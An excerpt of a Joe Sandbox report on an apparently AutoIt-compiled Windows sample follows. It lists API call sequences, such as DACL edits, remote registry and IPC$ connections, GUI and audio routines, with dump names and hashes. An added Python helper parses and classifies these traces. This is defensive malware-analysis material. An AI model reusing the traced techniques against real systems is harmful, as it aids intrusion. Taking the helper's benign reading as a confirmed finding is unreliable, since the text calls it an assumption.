• GetObjectW.GDI32(?,00000018,000000FF), ref: 00F2E809
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F2E834
• DeleteObject.GDI32(00000000), ref: 00F2E85C
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F2E872
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: fb9a26ea11eed1f69eeddcafd7acda987417dea511cb46a65aade70952d15c71
• Instruction ID: 9ab3cdf0939b54f371a733cd47de4d499d0fadfda39312ddb12e3fed7a5d75f7
• Opcode Fuzzy Hash: fb9a26ea11eed1f69eeddcafd7acda987417dea511cb46a65aade70952d15c71
• Instruction Fuzzy Hash: 90413A79A00218EFDB119F65DC48EAA7BB8EF9AB21F204058FD15D7260D7719D41EB20

APIs
• __wsplitpath.LIBCMT ref: 00F1076F
• _wcscat.LIBCMT ref: 00F10787
• _wcscat.LIBCMT ref: 00F10799
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F107AE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F107C2
• GetFileAttributesW.KERNEL32(?), ref: 00F107DA
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00F107F4
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F10806
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 70c32fd856cddc145ebf79c595d1f1f103f7160d826f22675f5fe81b22b21265
• Instruction ID: ba7a36e112cee236a9aad1186baf8eb53e071a7247e3bd2698b64ea8e96a2613
• Opcode Fuzzy Hash: 70c32fd856cddc145ebf79c595d1f1f103f7160d826f22675f5fe81b22b21265
• Instruction Fuzzy Hash: 2481A2729043459FCB24DF24C845AAEB3E8BBD8324F14482EF885D7251EBB4DDC5AB52

APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F2EF3B
• GetFocus.USER32 ref: 00F2EF4B
• GetDlgCtrlID.USER32(00000000), ref: 00F2EF56
• _memset.LIBCMT ref: 00F2F081
• GetMenuItemInfoW.USER32 ref: 00F2F0AC
• GetMenuItemCount.USER32(00000000), ref: 00F2F0CC
• GetMenuItemID.USER32(?,00000000), ref: 00F2F0DF
• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F2F113
• GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F2F15B
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F2F193
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F2F1C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: a51389ec4d054c96d2044bf79e283fae223c33545e0a7eb9058e0071582fc8b2
• Instruction ID: afdb17330ca874a1ecba60b8741fd01e6fbe65e595b54cab3a601f174abccb1f
• Opcode Fuzzy Hash: a51389ec4d054c96d2044bf79e283fae223c33545e0a7eb9058e0071582fc8b2
• Instruction Fuzzy Hash: 4B819D71619325AFD710CF14E984A6BBBF8FB88324F14053EF99897291D730D815EB92
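The API lists in these entries are the quickest way to tell what a resolved function does without opening the dump in IDA: the immediate arguments are given where they were constant (a `?` means the value was not resolved), and the order of calls identifies the routine. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling. It parses lines in exactly the format printed above, decodes the CreateFileW access mask and creation disposition and the Send/PostMessage message IDs, and matches the direct call sequence against a few ordered API subsequences. The pattern labels, the constant tables and the sample lines (copied, abridged, from the entries above) are this example's own choices; the reading that these three sequences are ordinary GUI-runtime routines (picture-control image loading, a directory walk that resets file attributes, menu radio-item handling) rather than payload code is an analyst's assumption, not a report finding.

```python
"""Parse the 'APIs' list of a Joe Sandbox function entry and summarise the
call sequence.  Added example: sample lines are copied (abridged) from the
report entries above; labels and constant tables are this example's own."""
import re
from dataclasses import dataclass
from typing import Optional

# "• Name.MODULE(arg,...), ref: ADDR", optionally prefixed by
# "Part of subcall function XXXXXXXX:" for calls made inside a callee.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # resolved constants as int, unresolved '?' as None
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when the call happens in a subcall

def _arg(tok: str):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # "-00000001" -> -1

def parse_api_block(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
WINDOW_MSG = {0x0111: "WM_COMMAND", 0x0172: "STM_SETIMAGE"}

def describe_create_file(call: ApiCall) -> str:
    """Decode dwDesiredAccess (arg 1) and dwCreationDisposition (arg 4)."""
    access, disp = call.args[1], call.args[4]
    bits = [n for b, n in GENERIC.items() if access is not None and access & b]
    return f"{'|'.join(bits) or '?'} / {DISPOSITION.get(disp, '?')}"

def window_messages(calls) -> list:
    """(api, message name) for every Send/PostMessage whose uMsg was resolved."""
    return [(c.name, WINDOW_MSG.get(c.args[1], hex(c.args[1])))
            for c in calls
            if c.name in ("SendMessageW", "PostMessageW") and c.args[1] is not None]

# Ordered subsequences that identify common library routines (labels are ours).
PATTERNS = {
    "ole_picture_load": ["CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"],
    "recursive_attrib_change": ["SetCurrentDirectoryW", "GetFileAttributesW",
                                "SetFileAttributesW", "SetCurrentDirectoryW"],
    "dacl_modification": ["GetSecurityDescriptorDacl", "GetAce", "AddAce", "CopySid"],
    "menu_radio_update": ["GetMenuItemInfoW", "CheckMenuRadioItem", "DefDlgProcW"],
}

def _is_subsequence(needle, haystack) -> bool:
    it = iter(haystack)
    return all(any(n == h for h in it) for n in needle)

def classify(calls) -> list:
    names = [c.name for c in calls if c.subcall is None]   # direct calls only
    return [label for label, seq in PATTERNS.items() if _is_subsequence(seq, names)]

# Constructed samples: lines copied (abridged) from the three entries above.
PICTURE_ENTRY = """\
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F2E754
• GetFileSize.KERNEL32(00000000,00000000), ref: 00F2E76B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F2E776
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F2E79B
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F2E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00F4D9BC,?), ref: 00F2E7D5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F2E872
"""
ATTRIB_ENTRY = """\
• __wsplitpath.LIBCMT ref: 00F1076F
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F107AE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F107C2
• GetFileAttributesW.KERNEL32(?), ref: 00F107DA
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00F107F4
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F10806
"""
MENU_ENTRY = """\
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F2EF3B
• GetMenuItemInfoW.USER32 ref: 00F2F0AC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F2F193
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F2F1C8
"""

if __name__ == "__main__":
    for label, text in (("picture", PICTURE_ENTRY), ("attrib", ATTRIB_ENTRY), ("menu", MENU_ENTRY)):
        calls = parse_api_block(text)
        print(label, classify(calls), window_messages(calls))
    print(describe_create_file(parse_api_block(PICTURE_ENTRY)[0]))
```

The first entry resolves to a read-only open (GENERIC_READ, OPEN_EXISTING) followed by STM_SETIMAGE, which is what you expect from a picture control being populated, not from a dropper writing to disk; the attribute walker and the menu handler classify the same way. Calls reported under "Part of subcall function" are kept but excluded from sequence matching so that a callee's GetWindowLongW does not masquerade as a direct call. Only constants the sandbox resolved are decoded; a `?` stays unknown rather than being guessed.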

APIs
  • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
  • Part of subcall function 00EFABBB: GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
  • Part of subcall function 00EFABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
  • Part of subcall function 00EFABBB: HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
  • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
  • Part of subcall function 00EFAC56: GetProcessHeap.KERNEL32(00000008,00EFA6B5,00000000,00000000,?,00EFA6B5,?), ref: 00EFAC62
  • Part of subcall function 00EFAC56: HeapAlloc.KERNEL32(00000000,?,00EFA6B5,?), ref: 00EFAC69
  • Part of subcall function 00EFAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EFA6B5,?), ref: 00EFAC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EFA8CB
• _memset.LIBCMT ref: 00EFA8E0
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EFA8FF
• GetLengthSid.ADVAPI32(?), ref: 00EFA910
• GetAce.ADVAPI32(?,00000000,?), ref: 00EFA94D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EFA969
• GetLengthSid.ADVAPI32(?), ref: 00EFA986
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EFA995
• HeapAlloc.KERNEL32(00000000), ref: 00EFA99C
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EFA9BD
• CopySid.ADVAPI32(00000000), ref: 00EFA9C4
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EFA9F5
                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EFAA1B
                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EFAA2F
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: 92db0be22d45ba7e3c860fa471fedde5ddd4811ec3448da4cc757dce3ef61994
• Instruction ID: a157441dc4fda04ee4e7d90fafe7a1a9fea2f522eae0532a0f162bc93958dcb6
• Opcode Fuzzy Hash: 92db0be22d45ba7e3c860fa471fedde5ddd4811ec3448da4cc757dce3ef61994
• Instruction Fuzzy Hash: F8514CB5A0020DABDF11DF94DC44AFEBBB9FF05304F089129E915AB290D7319A05DB61
APIs
• GetDC.USER32(00000000), ref: 00F19E36
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F19E42
• CreateCompatibleDC.GDI32(?), ref: 00F19E4E
• SelectObject.GDI32(00000000,?), ref: 00F19E5B
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F19EAF
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00F19EEB
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F19F0F
• SelectObject.GDI32(00000006,?), ref: 00F19F17
• DeleteObject.GDI32(?), ref: 00F19F20
• DeleteDC.GDI32(00000006), ref: 00F19F27
• ReleaseDC.USER32(00000000,?), ref: 00F19F32
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 619035b662b7bea90f298a1634fdefb40292c2113a36c73651b8dcaadea212bf
• Instruction ID: e5ace5c34c68a5b6271911deb46ba77808990b44ffbc7c45f2cb9f4ffd9ec42b
• Opcode Fuzzy Hash: 619035b662b7bea90f298a1634fdefb40292c2113a36c73651b8dcaadea212bf
• Instruction Fuzzy Hash: 18516A76904309EFDB15CFA8CC84EAEBBB9EF49710F14841DF95AA7210C771A841DBA0
APIs
Strings
Similarity
• API ID: LoadString__swprintf_wprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2889450990-2391861430
• Opcode ID: 5f38315fd6759794a5451113f6d6f7c4cf0e94ad51904d998758b9b611ac7417
• Instruction ID: 1fe2a0d5021f25f5cb45f33428c06bd884e98f272b4e75d64f23874a9d23c4d9
• Opcode Fuzzy Hash: 5f38315fd6759794a5451113f6d6f7c4cf0e94ad51904d998758b9b611ac7417
• Instruction Fuzzy Hash: 38516572901509BACB15EBE0CE46FEEB7B8AF15300F10416AF505721A2EB316F56FB61
APIs
Strings
Similarity
• API ID: LoadString__swprintf_wprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 2889450990-3420473620
• Opcode ID: dc59dc6323d736196de4cabed764a563f1325de805bb1490e87a2561dc52c216
• Instruction ID: 2d10723fa1739dbae718d4487d1df8e1d0cdbb7037dfd61ca6f1c2d33a2a8fb7
• Opcode Fuzzy Hash: dc59dc6323d736196de4cabed764a563f1325de805bb1490e87a2561dc52c216
• Instruction Fuzzy Hash: BD518572900609BADB15EBE0CE46FEEB7B8AF04300F104159F50972192DB756F9AFB61
APIs
• _memset.LIBCMT ref: 00F055D7
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F05664
• GetMenuItemCount.USER32(00F81708), ref: 00F056ED
• DeleteMenu.USER32(00F81708,00000005,00000000,000000F5,?,?), ref: 00F0577D
• DeleteMenu.USER32(00F81708,00000004,00000000), ref: 00F05785
• DeleteMenu.USER32(00F81708,00000006,00000000), ref: 00F0578D
• DeleteMenu.USER32(00F81708,00000003,00000000), ref: 00F05795
• GetMenuItemCount.USER32(00F81708), ref: 00F0579D
• SetMenuItemInfoW.USER32(00F81708,00000004,00000000,00000030), ref: 00F057D3
• GetCursorPos.USER32(?), ref: 00F057DD
• SetForegroundWindow.USER32(00000000), ref: 00F057E6
• TrackPopupMenuEx.USER32(00F81708,00000000,?,00000000,00000000,00000000), ref: 00F057F9
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F05805
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: d9e589f26c45b5b70f52e6b468e341724aa724d5c81bab38e44716b32baa3846
• Instruction ID: 30d0a7a345e7e785ce6b739d8d967f15395a5e6a42fd9c435f3b93fecd663213
• Opcode Fuzzy Hash: d9e589f26c45b5b70f52e6b468e341724aa724d5c81bab38e44716b32baa3846
• Instruction Fuzzy Hash: 09710471A41609BEEB209F54CC49FABBF69FF00B64F244205FA156A1D1CBB26850FF54
APIs
• _memset.LIBCMT ref: 00EFA1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EFA211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EFA22D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EFA249
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EFA273
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EFA29B
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EFA2A6
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EFA2AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1687751970-22481851
• Opcode ID: 3a8b2570597a3961ac4b979160a51bb48a93a71f3f783a124448caf06ea1d656
• Instruction ID: a7220abca0496fd7b44eff8ca0a1b9d84bb60216e2dd7732f1ff30bea474ae45
• Opcode Fuzzy Hash: 3a8b2570597a3961ac4b979160a51bb48a93a71f3f783a124448caf06ea1d656
• Instruction Fuzzy Hash: CA410776C1022DAADB11EFA4DC85EEEB7B8FF14300F04506AE905B7160EA359E06DB51
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: fc0de512e5a0db1d6693a8e60676303c42a15a2e450dba6701175bb70fc2f5a2
• Instruction ID: 23971ea93b38ffc1e5ca003a4834bd0829480c79d901ab08524624465a0aa0f0
• Opcode Fuzzy Hash: fc0de512e5a0db1d6693a8e60676303c42a15a2e450dba6701175bb70fc2f5a2
• Instruction Fuzzy Hash: 9F41737051029E8BDF00EF10E941AEB73A5FF52310F54581AEC552B392EB74AE0BEB11
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F336F4,00000010,?,Bad directive syntax error,00F5DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F025D6
• LoadStringW.USER32(00000000,?,00F336F4,00000010), ref: 00F025DD
• _wprintf.LIBCMT ref: 00F02610
• __swprintf.LIBCMT ref: 00F02632
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F026A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1080873982-4153970271
• Opcode ID: 3afbe5f4dbb4f4c555e349b482fc1a5dd0337498e2b7705ce9e008e062809daf
• Instruction ID: 9bdee3fe475b9a1ef18a6b88a6f25c8824316d3a75a05c2f2ae93a661dc42b39
• Opcode Fuzzy Hash: 3afbe5f4dbb4f4c555e349b482fc1a5dd0337498e2b7705ce9e008e062809daf
• Instruction Fuzzy Hash: 0B21533280021DBFCF11AB90CC4AFEE7B79BF19304F04445AF509761A2DA72A655EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F07B42
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F07B58
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F07B69
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F07B7B
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F07B8C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SendString
                                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                      • API String ID: 890592661-1007645807
                                                                                                                                                                                                                                                      • Opcode ID: f8326a15c2f9395a49a942f5e6940130a6b7a482e447bbc67d64f9d6bd938574
                                                                                                                                                                                                                                                      • Instruction ID: f8e2c420a5a77c8ab04d7ca86ed06823962b4fa4d1377ef1b9dd02c5c23f3631
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8326a15c2f9395a49a942f5e6940130a6b7a482e447bbc67d64f9d6bd938574
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA11C8F195426979D724B361CC4AEFFBABCEBD1B10F00055EB415B20C1DE609A46E5B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00F07794
                                                                                                                                                                                                                                                        • Part of subcall function 00EDDC38: timeGetTime.WINMM(?,75C0B400,00F358AB), ref: 00EDDC3C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00F077C0
                                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00F077E4
                                                                                                                                                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00F07806
                                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00F07825
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F07833
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F07852
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00F0785D
                                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00F07869
                                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00F0787A
                                                                                                                                                                                                                                                      Strings
